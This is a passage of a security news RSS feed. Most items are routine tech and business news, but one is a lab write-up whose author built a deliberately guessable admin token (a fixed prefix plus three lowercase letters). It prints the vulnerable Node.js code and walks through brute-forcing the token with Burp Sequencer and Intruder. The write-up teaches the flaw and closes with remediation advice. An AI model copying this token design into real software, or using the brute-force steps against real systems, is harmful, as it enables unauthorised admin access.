href="https://www.reddit.com/r/security/comments/1swm261/just_got_our_audit_back_and_a_whooping_100_of/">[link]</a></span>   <span><a href="https://www.reddit.com/r/security/comments/1swm261/just_got_our_audit_back_and_a_whooping_100_of/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[I Reduced My Pandas Runtime by 95% — Here’s What I Was Doing Wrong]]></title>
<description><![CDATA[Most slow Pandas code "works", until it doesn't. Learn how to spot hidden bottlenecks, avoid costly row-wise operations, and know when Pandas is no longer enough.
The post I Reduced My Pandas Runtime by 95% — Here’s What I Was Doing Wrong appeared first on Towards Data Science.]]></description>
<link>https://tsecurity.de/de/3465773/ai-nachrichten/i-reduced-my-pandas-runtime-by-95-heres-what-i-was-doing-wrong/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3465773/ai-nachrichten/i-reduced-my-pandas-runtime-by-95-heres-what-i-was-doing-wrong/</guid>
<pubDate>Sun, 26 Apr 2026 15:02:40 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Most slow Pandas code "works", until it doesn't. Learn how to spot hidden bottlenecks, avoid costly row-wise operations, and know when Pandas is no longer enough.</p>
<p>The post <a href="https://towardsdatascience.com/i-reduced-my-pandas-runtime-by-95-heres-what-i-was-doing-wrong/">I Reduced My Pandas Runtime by 95% — Here’s What I Was Doing Wrong</a> appeared first on <a href="https://towardsdatascience.com/">Towards Data Science</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[I Built This Vulnerable Token on Purpose. Here’s How You’d Break It.]]></title>
<description><![CDATA[When I design a lab, I have to make a deliberate choice: how broken should this be?This token needed to look legitimate enough to fool a developer. So I stored it in a cookie, marked it httpOnly, and protected it by access checks. All the right boxes ticked. But underneath that, I gave it only 17...]]></description>
<link>https://tsecurity.de/de/3464996/hacking/i-built-this-vulnerable-token-on-purpose-heres-how-youd-break-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3464996/hacking/i-built-this-vulnerable-token-on-purpose-heres-how-youd-break-it/</guid>
<pubDate>Sun, 26 Apr 2026 05:06:38 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/925/1*TAZ2s5MF0tMmql6gvjCl3g.png"></figure><p>When I design a lab, I have to make a deliberate choice: how broken should this be?</p><p>This token needed to look legitimate enough to fool a developer. So I stored it in a cookie, marked it httpOnly, and protected it by access checks. All the right boxes ticked. But underneath that, I gave it only 17,576 possible values. The goal was for hackers to reach for BurpSuite’s Sequencer: a tool that exposes the (lack of) randomness in tokens by sending ~20,000 requests and graphing the entropy of each response.</p><h3>Token</h3><p>Usually I use a JWT with a role parameter to check if a resource can be accessed. If you need a resource to be accessible for some users, but you don't want your JWT to leak information, you can use a token to grant certain permissions.</p><p>In this lab, I added a /administrator page that was only accessible if the user had a certain adminAccessToken. I deliberately called it that way to point attackers in a certain direction, and I gave everyone who logged in an invalid token. So it would be very obvious to at least take a look at the token. Additionally, if the attacker would perform a directory busting attack on the application and find the /administrator endpoint, the page itself also said that the adminAccessToken wasn't sufficient.</p><p>Plenty of reasons to look at that token.</p><p>I wanted Sequencer to have an easy time analyzing it and I wanted to make sure that if an attacker didn’t know how to use Sequencer, they would also see a subtle difference and had to put two and two together.</p><p>In my opinion the best way to do that was to have a “base” code, that would be suffixed with 3 lowercase characters, except for one particular combination. My initial thought was to take a normal string, base64-encode it, and append a base64-encoded string after that. The reason for this was to further extend the learning that Sequencer can also decode base64-tokens before analyzing them, but then I would give attackers with little to no experience a very tough time, not to mention that it would be tedious to manually discover that only the three last characters change in a base64-token.</p><p>So I decided that I would take a random string without any meaning, and append 3 lowercase characters to it (as long as that suffix isn’t rls). This creates a string that seems safe enough (and is safe enough for a lab) and will make hackers curious.</p><p>The number of possibilities is straightforward: the alphabet has 26 characters, and we pick 3 of them, so that’s 26 × 26 × 26 = <strong>17,576</strong> total combinations. One of those (rls) is the valid admin token, and the rest are handed out to regular users. An attacker only needs to try at most 17,575 tokens to gain admin access.</p><pre>function setToken() {<br>    const prefix = "n0MqjBXna9A4";<br>    const suffix = generateSuffix();<br>    const token = `${prefix}${suffix}`;<br>    return token;<br>    <br>}<br>function generateSuffix(){<br>    const chars = "abcdefghijklmnopqrstuvwxyz";<br>    let suffix;<br>    do {<br>        const first = chars[Math.floor(Math.random() * chars.length)];<br>        const second = chars[Math.floor(Math.random() * chars.length)];<br>        const third = chars[Math.floor(Math.random() * chars.length)];<br>        suffix = first + second + third;<br>    } while (suffix === "rls");<br>    return suffix;<br>}</pre><p>This code would run on each login with this backend code</p><pre>app.post('/login', (req, res) =&gt; {<br>  const { username, password } = req.body;<br>// Code shortened for clarity<br>  const authToken = setToken();<br>  res.cookie("adminAccessToken", authToken, {<br>    httpOnly: true,<br>    sameSite: "lax",<br>    path: "/"<br>  });<br>  res.redirect('/dashboard');<br>});</pre><p>The security on the authToken is ok, sameSite='lax' and httpOnly: true are considered safe options for a cookie. This is also necessary to not make the attacker think there is a vulnerability with the transport of the cookie.</p><p>The real danger is not the lack of security on the cookie, it’s the cookie itself that is insecure. Problem is that I’ve seen this in some real projects in a development phase. The communication with a project manager usually goes something like this:</p><pre>1 Week before a client meeting<br>-------------------------------<br>PM:   We need access control on administrative functions.<br>Dev:  Sure! Let's figure out how we are going to implement <br>      access control for restricted functionality.<br>PM:   Can you just make a quick PoC, <br>      we'll have to showcase it in a sandbox to the client before we deliver.<br>Dev:  Ok, but it's gonna take more time to implement security afterwards.<br>PM:   Just make it seem like it works, it's just for the demo.<br><br>1 hour after the meeting<br>-------------------------------<br>PM:  We need to ship this now.<br>Dev: ...</pre><p>So code ships like this (this is how it is on Gift-List)</p><pre>app.get("/administrator", requireLogin, (req, res) =&gt; {<br>  if(req.cookies.adminAccessToken === "n0MqjBXna9A4rls"){<br>    res.render("administrator", { flag: FLAG })<br>  } else {<br>    res.render("denied")<br>  }<br>})</pre><p>In theory, this is a good security measure, and would be fine if the token wasn’t so inherently bad. In the end you’d do the same thing with a JWT.</p><pre>app.get("/administrator", requireLogin, (req, res) =&gt; {<br>  if(req.user.role === "administrator"){<br>    res.render("administrator", { flag: FLAG })<br>  } else {<br>    res.render("denied")<br>  }<br>})</pre><p>And that is fine, <em>if</em> you don’t mess up your implementation of the JWT of course.</p><h3>Attack Path</h3><p>So we went over the code, time to showcase what the attack would look like on the lab.</p><p>After registering, the hacker would log in and notice the token in the response.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*0iymnXSNcA1E95fSoBuRVg.png"></figure><p>The next step would be to fuzz the application on endpoints. I used BurpSuite Pro’s Intruder and common.txt from SecLists to do that.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*6dBNb9-KBxf-O_8A_cA8Kg.png"></figure><p>Now the attacker would see that the access is denied. When they navigate to the URL, an error message gives them a slight nudge in the right direction.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/578/1*YWAb2JlBmoegAUampHzNfg.png"></figure><p>The idea now is to send the <strong><em>login request</em></strong> to Sequencer. We need the login request because that is where our application responds with a different token each time.</p><blockquote><em>Don’t forget that you can adjust the number of threads in the settings!</em></blockquote><figure><img alt="" src="https://cdn-images-1.medium.com/max/755/1*QToLQrtK3I0Uz9dzzq6ROw.png"></figure><p>So now we know that only the last three characters are changing, we need to look a bit at how this suffix is ‘configured’. What I recommend here is to click copy tokens and you'll get a list like this</p><pre>...<br>n0MqjBXna9A4dwx<br>n0MqjBXna9A4aej<br>n0MqjBXna9A4sdf<br>n0MqjBXna9A4nds<br>n0MqjBXna9A4qdo<br>n0MqjBXna9A4dzn<br>n0MqjBXna9A4ljc<br>n0MqjBXna9A4vgy<br>n0MqjBXna9A4jtf<br>n0MqjBXna9A4efq<br>n0MqjBXna9A4zuc<br>n0MqjBXna9A4xfe<br>n0MqjBXna9A4zrn<br>n0MqjBXna9A4psx<br>n0MqjBXna9A4itz<br>n0MqjBXna9A4kgt<br>n0MqjBXna9A4eit<br>n0MqjBXna9A4vrs<br>n0MqjBXna9A4uoj<br>n0MqjBXna9A4iew<br>...</pre><p>If we look closely, we can confirm that only the last three characters change, and that they are all lowercase letters. We now have enough information to go to Intruder.</p><p>We’ll set up Intruder to perform a Brute Force attack and see if we can access the /administrator page. Our setup is a Brute Force with the 26 lowercase letters for a minimum and maximum length of 3.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*joczLvsUhvQTdpDAkUkr1A.png"></figure><p>After the attack ran, we now just have to sort on the length to find which request triggered a different response.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*2oHoK0s3zKTNhpeyhqIIsg.png"></figure><p>So now we know that the token we need ends with rls because that is the payload that triggered a different response length.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*GH84siTdRpY2dydg05EyFQ.png"></figure><p>Change your cookie, navigate to /administrator, and just like that, the attacker obtains the flag.</p><h3>Takeaway</h3><p>What I wanted to achieve in this lab were two things:</p><ul><li>Show the people who tried this lab how they could use Sequencer if they had never used it, or remind them that Sequencer exists.</li><li>Demonstrate how tokens can be abused, even if a developer uses the correct settings to protect the cookie itself, but doesn’t implement a token that is inherently secure.</li></ul><p>The core insight is this: httpOnly and sameSite protect the <em>transport</em> of your token — they don't say anything about the <em>value</em> inside it. A well-protected cookie containing a predictable token is still a vulnerability waiting to be exploited.</p><p>If you need a token like this, use crypto.randomBytes(32) or a UUID. Don't roll your own.</p><p>And remember the PM/Dev conversation above. The most dangerous line in software security isn’t a SQL query or an eval — it’s <em>“just make it seem like it works, it’s just for the demo.”</em></p><p><em>I break web apps for fun, make vulnerable labs to learn, and write about it so you can too.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=09e925a2c222" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/i-built-this-vulnerable-token-on-purpose-heres-how-you-d-break-it-09e925a2c222">I Built This Vulnerable Token on Purpose. Here’s How You’d Break It.</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Too Many Vulnerabilities? Here’s How AutoSecT Risk Prioritization Helps!]]></title>
<description><![CDATA[If your security team is drowning in vulnerabilities, that’s math done wrong. Prioritize your risk with the right vulnerability assessment tool. Here’s why? The volume of vulnerabilities has exploded beyond what any team can realistically handle. 48,185 CVEs were published…
Read more →
The post T...]]></description>
<link>https://tsecurity.de/de/3461958/it-security-nachrichten/too-many-vulnerabilities-heres-how-autosect-risk-prioritization-helps/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3461958/it-security-nachrichten/too-many-vulnerabilities-heres-how-autosect-risk-prioritization-helps/</guid>
<pubDate>Fri, 24 Apr 2026 17:21:19 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>If your security team is drowning in vulnerabilities, that’s math done wrong. Prioritize your risk with the right vulnerability assessment tool. Here’s why? The volume of vulnerabilities has exploded beyond what any team can realistically handle. 48,185 CVEs were published…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/too-many-vulnerabilities-heres-how-autosect-risk-prioritization-helps/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/too-many-vulnerabilities-heres-how-autosect-risk-prioritization-helps/">Too Many Vulnerabilities? Here’s How AutoSecT Risk Prioritization Helps!</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Second Wind Games Showcase presented lots of games - here's 12 world premieres]]></title>
<description><![CDATA[The Second Wind Games Showcase was live bringing fresh looks at various games, and there were 12 world premieres.Read the full article on GamingOnLinux.]]></description>
<link>https://tsecurity.de/de/3461794/linux-tipps/second-wind-games-showcase-presented-lots-of-games-heres-12-world-premieres/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3461794/linux-tipps/second-wind-games-showcase-presented-lots-of-games-heres-12-world-premieres/</guid>
<pubDate>Fri, 24 Apr 2026 16:24:00 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The Second Wind Games Showcase was live bringing fresh looks at various games, and there were 12 world premieres.<p><img src="https://www.gamingonlinux.com/uploads/articles/tagline_images/362485552id28889gol.jpg" alt></p><p>Read the full article on <a href="https://www.gamingonlinux.com/2026/04/second-wind-games-showcase-presented-lots-of-games-heres-12-world-premieres/">GamingOnLinux</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Morning After: Polymarket and a hairdryer]]></title>
<description><![CDATA[Although it’s one of the more inoffensive topics on Polymarket, this news typifies the Wild West of prediction markets and betting sites. A hairdryer was allegedly used to rig Polymarket bets on temperatures at Charles de Gaulle Airport in Paris, according to a report by The Telegraph. French aut...]]></description>
<link>https://tsecurity.de/de/3461341/it-nachrichten/the-morning-after-polymarket-and-a-hairdryer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3461341/it-nachrichten/the-morning-after-polymarket-and-a-hairdryer/</guid>
<pubDate>Fri, 24 Apr 2026 13:46:46 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Although it’s one of the more inoffensive topics on Polymarket, this news typifies the Wild West of prediction markets and betting sites. A <a data-i13n="cpos:1;pos:1" href="https://www.engadget.com/big-tech/someone-allegedly-used-a-hairdryer-to-rig-polymarket-weather-bets-155312411.html">hairdryer</a> was allegedly used to rig Polymarket bets on temperatures at Charles de Gaulle Airport in Paris, according to a report by <em>The Telegraph</em>. French authorities noted that the official temperature readings at the airport spiked twice in the past month. On both occasions, gamblers betting on those temperature fluctuations on Polymarket appear to have walked away with thousands upon thousands of dollars.</p>
<p>There is no indication that Polymarket forced anyone to return winnings, but the temperature sensor has been moved to a new location. The site is also still running bets on the daily temperature in and around Paris.</p>
<p>In a more serious development, a US soldier was arrested for allegedly making over $400,000 on Polymarket using information he had about the plans to capture the former Venezuelan president, <a data-i13n="cpos:2;pos:1" href="https://www.engadget.com/social-media/nicolas-maduro-bans-x-in-venezuela-for-10-days-amid-elon-musk-dispute-163049192.html">Nicolás Maduro</a>.</p>
<p>Gannon Ken Van Dyke was <a data-i13n="cpos:3;pos:1" href="https://www.engadget.com/apps/us-soldier-arrested-for-allegedly-making-over-400000-on-polymarket-with-classified-maduro-information-014531367.html">arrested</a> and charged with using classified military information to place bets on the prediction marketplace Polymarket. Van Dyke created a Polymarket account around December 26, 2025, and made 13 bets related to Maduro from December 27 to January 2.</p>
<p>The soldier has also been charged with one count of wire fraud, carrying a maximum penalty of 20 years in prison, and one count of unlawful monetary transaction, carrying a maximum sentence of 10 years. It’s a lot heavier than hairdryer shenanigans.</p>
<p>— Mat Smith</p>
<h3>The other big stories (and deals) this morning</h3>
<ul>
<li><p><a data-i13n="cpos:4;pos:1" href="https://www.engadget.com/big-tech/heres-to-the-stable-ones-in-praise-of-tim-cook-144850435.html">Here’s to the stable ones: In praise of Tim Cook</a></p></li>
<li><p><a data-i13n="cpos:5;pos:1" href="https://www.engadget.com/social-media/meta-is-downsizing-by-about-10-percent-192658099.html">Meta is downsizing by about 10 percent</a></p></li>
<li><p><a data-i13n="cpos:6;pos:1" href="https://www.engadget.com/general/hey-meta-workers-are-you-getting-paid-for-those-keystrokes-131934881.html">Hey Meta workers, are you getting paid for those keystrokes?</a></p></li>
<li><p><a data-i13n="cpos:7;pos:1" href="https://www.engadget.com/entertainment/tv-movies/apple-tvs-upcoming-for-all-mankind-spinoff-star-city-oozes-cold-war-era-paranoia-180429809.html">Apple TV’s upcoming For All Mankind spinoff Star City oozes Cold War-era paranoia</a></p></li>
</ul>
<hr>
<h2><a data-i13n="cpos:8;pos:1" href="https://www.engadget.com/cameras/dji-lito-1-and-lito-x1-drone-review-high-quality-aerial-video-at-its-most-affordable-120024032.html">DJI Lito 1 and Lito X1 drone review</a></h2>
<h3>High-quality aerial video at its most affordable.</h3>
<a href="https://www.engadget.com/cameras/dji-lito-1-and-lito-x1-drone-review-high-quality-aerial-video-at-its-most-affordable-120024032.html"><figure><img src="https://s.yimg.com/os/creatr-uploaded-images/2026-04/878ccac0-3fce-11f1-b7bf-266b01830216" data-crop-orig-src="https://s.yimg.com/os/creatr-uploaded-images/2026-04/878ccac0-3fce-11f1-b7bf-266b01830216" alt="TMA" data-uuid="97f4fef5-2bda-30bb-85e3-4df0cc6b07f7"><figcaption></figcaption><div class="photo-credit">Engadget</div></figure></a>
<p>DJI is taking another stab at the budget drone market with the new Lito series. The Lito 1 and Lito X1 are both under $400 and weigh less than 249 grams — they’re ideal for beginners. Both replace DJI’s Mini series, but they offer things those models lacked, like LiDAR and 360-degree obstacle avoidance. After testing both models, I believe they offer unbeatable value and performance at these prices, by a long shot. However, due to <a data-i13n="cpos:9;pos:1" href="https://www.engadget.com/cameras/why-dji-drones-might-be-banned-in-the-us-170030273.html">DJI’s standing in the US</a>, you might not see either.</p>
<p><a data-i13n="cpos:10;pos:1" href="https://www.engadget.com/cameras/dji-lito-1-and-lito-x1-drone-review-high-quality-aerial-video-at-its-most-affordable-120024032.html"><strong>Continue reading.</strong></a></p>
<p></p>
<h2><a data-i13n="cpos:11;pos:1" href="https://www.engadget.com/gaming/xbox/xbox-cuts-game-pass-prices-but-new-call-of-duty-games-will-no-longer-hit-the-service-on-day-one-163636536.html">Xbox cuts Game Pass prices</a></h2>
<h3>But new Call of Duty games will no longer hit the service at launch.</h3>
<a href="https://www.engadget.com/gaming/xbox/xbox-cuts-game-pass-prices-but-new-call-of-duty-games-will-no-longer-hit-the-service-on-day-one-163636536.html"><figure><img src="https://s.yimg.com/os/creatr-uploaded-images/2026-04/43ea7dd0-3fce-11f1-8ce7-de53bbc17bdf" data-crop-orig-src="https://s.yimg.com/os/creatr-uploaded-images/2026-04/43ea7dd0-3fce-11f1-8ce7-de53bbc17bdf" alt="TMA" data-uuid="d5a71241-d252-319f-aba0-7577bd4077a7"><figcaption></figcaption><div class="photo-credit">Activision</div></figure></a>
<p>As suggested by recent <a data-i13n="cpos:12;pos:1" href="https://www.engadget.com/gaming/xbox/xbox-ceo-called-game-pass-too-expensive-for-players-in-a-leaked-memo-194749597.html">comments</a> by the new boss of Xbox, Microsoft’s gaming arm is cutting the prices of both Game Pass Ultimate and PC Game Pass, effective immediately, but there’s one big caveat. New Call of Duty games will no longer be available on Game Pass Ultimate or PC Game Pass on day one. They’ll eventually hit those tiers about a year later, during the following holiday season.</p>
<p><a data-i13n="cpos:13;pos:1" href="https://www.engadget.com/gaming/xbox/xbox-cuts-game-pass-prices-but-new-call-of-duty-games-will-no-longer-hit-the-service-on-day-one-163636536.html"><strong>Continue reading.</strong></a></p>
<p></p>
<span></span><h2><a data-i13n="cpos:14;pos:1" href="https://www.engadget.com/ai/ankers-thus-chip-brings-ai-to-its-headphones-and-other-products-122142552.html">Accessory maker Anker made its own AI chip</a></h2>
<h3>Of course it did.</h3>
<h3></h3>
<p>Anker, of battery-pack and cable fame, has announced its own AI chip that it will integrate into its future headphones and other devices. The company is planning to debut the chip, called Thus, on a new model of headphones to be unveiled at its Anker Day event in May.</p>
<p>Anker’s Thus chip integrates computing power directly into NOR flash memory cells, which offer faster read speeds than NAND. Anker says headphones are a particularly challenging environment to demonstrate what a new chip can do because “hardly any other device places higher demands on an AI chip.” Anker announced one particular feature to showcase its silicon. Clear Calls will cancel noise “with a large neural network running entirely on the device, supported by eight MEMS microphones and two bone conduction sensors.”</p>
<p><a data-i13n="cpos:15;pos:1" href="https://www.engadget.com/ai/ankers-thus-chip-brings-ai-to-its-headphones-and-other-products-122142552.html"><strong>Continue reading.</strong></a></p>This article originally appeared on Engadget at https://www.engadget.com/general/the-morning-after-engadget-newsletter-112802570.html?src=rss]]></content:encoded>
</item>
<item>
<title><![CDATA[IT reskilling: the pressing CIO imperative]]></title>
<description><![CDATA[Keeping up with new technologies, and recalibrating existing ones, can seem almost impossible as they seem to appear every month. But innovation breeds necessity, so knowledge updates within the enterprise are essential to successful reskilling, and CIOs are the pacesetters.



“In our profession...]]></description>
<link>https://tsecurity.de/de/3460843/it-security-nachrichten/it-reskilling-the-pressing-cio-imperative/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3460843/it-security-nachrichten/it-reskilling-the-pressing-cio-imperative/</guid>
<pubDate>Fri, 24 Apr 2026 12:06:45 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Keeping up with new technologies, and recalibrating existing ones, can seem almost impossible as they seem to appear every month. But innovation breeds necessity, so knowledge updates within the enterprise are essential to successful reskilling, and CIOs are the pacesetters.</p>



<p>“In our profession, training is a given, like courage in soldiers,” says Gracia Sánchez-Vizcaíno, CIO of Securitas for Iberia and Latin America. “Without continuous training, teams become obsolete.</p>



<p>Disruption is also proportionate to the speed of change, leaving organizations usually a step behind technology. But <a href="https://www.cio.com/article/4126383/how-the-growing-ai-workforce-is-changing-the-cio-role.html?utm=hybrid_search">speed isn’t the only challenge facing IT departments</a>. The range of people themselves who need training has also changed. New technologies have become so intricate in corporate activity that staff training, as well as training of external teams, need to be more targeted.</p>



<p>So seeing which key knowledge areas dominate the concerns of CIOs and training experts helps visualize the scope of this challenge. Sánchez-Vizcaíno is focused on the particular speed of <a href="https://www.cio.com/article/4149449/4-agentic-ai-success-stories.html?utm=hybrid_search">agentic AI</a>. “We need a change in mindset, but also in knowledge,” she says.</p>



<p>Gen AI and cybersecurity are equally front of mind in developing new skills and knowledge, as are data analytics and automation. But the list also includes soft skills like communication, negotiation, and leadership since having critical thinking skills is equally important, says David González, business director of IT permanent recruitment at Hays Spain.</p>



<h2 class="wp-block-heading">Develop or hire?</h2>



<p><a href="https://www.cio.com/article/3615046/4-ways-to-build-a-team-equipped-with-emerging-skills.html?utm=hybrid_search">The need for staff to be adroit in emerging tech</a> also raises another the question of upskilling internally or hiring externally those already skilled. While the latter can bring benefits, the general consensus among IT leaders is strengthening an established team is more advantageous to yield significant returns.</p>



<p>“Within the technology market, reskilling shouldn’t be an option but an advantage,” González says, adding that it’s not so much about pitting one model against the other, but seeing what each one offers and valuing it on findings. The IT job market is no longer dominated by a kind of recruitment race, however. “Attracting talent is very difficult,” Sánchez-Vizcaíno says, whereas training is another form of compensation that increases commitment, broadens the staff skill base, and reduces dependence on external resources that can be expensive and noncommittal.</p>



<p>“The cost of hiring a new employee can be three times that of a proper reskilling program,” says Magalí Riera, director of the master’s degree in people management, talent, and digital transformation at UNIE University. “Skills development isn’t just a simple corporate wellness option, it’s a vital strategy for staying competitive.”</p>



<p>Similarly, when there’s already a well-oiled, functioning team in place with diverse profiles and talents, it may be more worthwhile to update rather than try to fit new people in. </p>



<p>“The team gives you something that goes beyond the technological aspect,” adds Álvaro Ontañón, CIO of Merlin Properties. But he, in turn, needs a team to deliver. “For me, within that context, trust is very important,” he says. “Once you have that, if the limitation is technology — unless it’s something very disruptive, requiring starting from scratch, or is expensive and requires hiring — we dedicate time to it.”</p>



<h2 class="wp-block-heading">What reskilling should look like</h2>



<p>Reskilling must be approached from a business perspective, says González, not just a technological one or with generic certifications. And a successful process must begin by understanding what will happen in the short, medium, and long term, promoting key market areas, and providing continuous but applied training.</p>



<p>And while industry experts acknowledge that video-based courses can be useful for routine tasks like safety training, they’re ineffective when it comes to developing new skills. Riera recommends project-based learning and avoiding purely passive learning methods.</p>



<p>Sánchez-Vizcaíno sees it firsthand as well. “The way we share and process information has also changed, and for all of this to work, it’s about moving from theoretical knowledge to <a href="https://www.cio.com/article/4134254/state-of-it-jobs-ai-sparks-rapidly-changing-market-for-skills.html?utm=hybrid_search">adaptable, practical skills</a>,” she says. Learning happens by sharing in Teams channels, talking with colleagues, and even listening to other companies. These are more multidirectional processes, compared to the unidirectional or bidirectional training of the past. “More than ever, it’s about learning by doing,” she adds.</p>



<p>Above all, it’s about creating a supportive and motivating environment, and fostering a fertile ground for learning and acquiring new skills. “If you want to benefit from learning, you must have an <a href="https://www.cio.com/article/4100412/it-talent-heres-how-cios-curate-engagement-and-retention.html?utm=hybrid_search">affinity for the training</a> you’re going to receive,” Ontañón says. In his team, staff are involved in the preliminary process since if there aren’t interested people, there’s no training. It’s a pragmatic decision that avoids the feeling of seeing a course as a burden, and reinforces the desire to participate. But that’s almost the default state in the IT world, being constantly on the cusp of change, even outside of work hours, and needing to learn. </p>



<p>Similarly, working with interests and needs in mind helps foster flexibility. “We dedicate a lot of time to this, because it’s what can guarantee its effectiveness,” says Ontañón, adding that it’s not about training for the sake of training, but responding to those concerns.</p>



<p>In a world where information is much more accessible than in the past, there are many more sources of knowledge. “The downside is because there’s so much, you have to find what really interests you and adapt to it,” he says.</p>



<h2 class="wp-block-heading">Reskilling incorporated in the corporate vision</h2>



<p>Equally important in the reskilling processes is monitoring its impact on the workforce. When change occurs, González says, productivity will initially drop before it rises. “Companies that fail are those that demand senior-level performance from the outset,” he says.</p>



<p>An adjustment period has to be factored in, which may even involve temporarily supplementing the workforce with external or temporary staff. “This learning process is a necessity,” Riera adds. “It’s not extra training or a reward for the employee, so it must be part of the work schedule.” She recommends not filling the entire workday with courses, but rather dedicate a small portion of the day to them so as not to hinder daily operations. Also, maintain clear communication with the team about what’s being done, why it’s being done, and what will be gained.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft taps Anthropic’s Mythos to strengthen secure software development]]></title>
<description><![CDATA[Microsoft plans to integrate Anthropic’s Mythos AI model into its Security Development Lifecycle, a move that suggests advanced generative AI is beginning to play a direct role in how major software vendors identify vulnerabilities and harden code against attack.



The company said it will use M...]]></description>
<link>https://tsecurity.de/de/3457525/it-security-nachrichten/microsoft-taps-anthropics-mythos-to-strengthen-secure-software-development/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3457525/it-security-nachrichten/microsoft-taps-anthropics-mythos-to-strengthen-secure-software-development/</guid>
<pubDate>Thu, 23 Apr 2026 11:51:57 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Microsoft plans to integrate Anthropic’s Mythos AI model into its Security Development Lifecycle, a move that suggests advanced generative AI is beginning to play a direct role in how major software vendors identify vulnerabilities and harden code against attack.</p>



<p>The company said it will use Mythos Preview, along with other advanced models, as part of a broader push to strengthen secure coding and vulnerability detection earlier in the software development process.</p>



<p>The announcement comes as <a href="https://www.computerworld.com/article/4162278/claude-mythos-signals-a-new-era-in-ai-driven-security-finding-271-flaws-in-firefox-3.html" target="_blank">Anthropic’s Mythos</a> heightens concerns that advanced AI models could dramatically shrink the time between finding a software flaw and exploiting it. Analysts say Mythos marks a notable leap in AI-driven vulnerability research, with the ability to uncover <a href="https://www.csoonline.com/article/4158117/anthropics-mythos-signals-a-structural-cybersecurity-shift.html" target="_blank">thousands of serious flaws</a> across major operating systems and browsers.</p>



<p>OpenAI has also entered the space with GPT-5.4-Cyber, a version of its flagship model tailored for defensive cybersecurity work. <a href="https://confidis.co/about/our-leadership-team/" target="_blank" rel="noreferrer noopener">Keith Prabhu</a>, founder and CEO of Confidis, said a future OpenAI model, which he referred to as “Spud,” could emerge as an even stronger rival.</p>



<p>The move matters beyond Microsoft’s own engineering organization. For enterprise security leaders, it offers a clear sign that frontier AI models are starting to move from experimental use into core cybersecurity workflows.</p>



<p>That could change how software vendors build products and how <a href="https://www.csoonline.com/article/4149411/ai-is-breaking-traditional-security-models-heres-where-they-fail-first.html">defenders view the risks and benefits</a> of using the same AI tools attackers may also exploit.</p>



<p>“This marks a seminal turning point in the secure software development lifecycle process,” Prabhu said. “While earlier tools were only capable of static code scanning for vulnerabilities, with AI, there is a possibility of a dynamically learning model which can also perform dynamic vulnerability and even penetration testing in real time.”</p>



<p>Over time, Prabhu said, the pressure to adopt AI-assisted security tools is likely to spread beyond the largest software vendors.</p>



<h2 class="wp-block-heading">Why Microsoft’s move matters</h2>



<p><a href="https://in.linkedin.com/in/meetneilshah" target="_blank" rel="noreferrer noopener">Neil Shah</a>, vice president for research at Counterpoint Research, said more than 95% of Fortune 500 companies use Microsoft Azure in some capacity, while Azure AI and the Copilot suite are entrenched across about 65% of those companies. Millions of businesses also rely on multiple Microsoft products and cloud services.</p>



<p>“Using Mythos in Microsoft’s Security Development Lifecycle could help strengthen and harden products like Windows, Azure, Microsoft 365, and developer tools,” Shah said. “Every enterprise running those products could benefit from the security improvement without needing direct Mythos access themselves.”</p>



<p>Prabhu noted that Microsoft said it had evaluated Mythos using its open-source benchmark for real-world detection engineering tasks, with results showing substantial improvements over prior models.</p>



<p>“Such a claim coming from Microsoft does suggest that these new AI models are becoming materially better at identifying exploitable flaws than earlier generations,” Prabhu added. “However, as with any AI tool, the strength of the tool lies in its ability to analyze code quickly based on past learning. There is a possibility that it could miss new types of vulnerabilities that only a ‘human-in-the-loop’ could identify.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
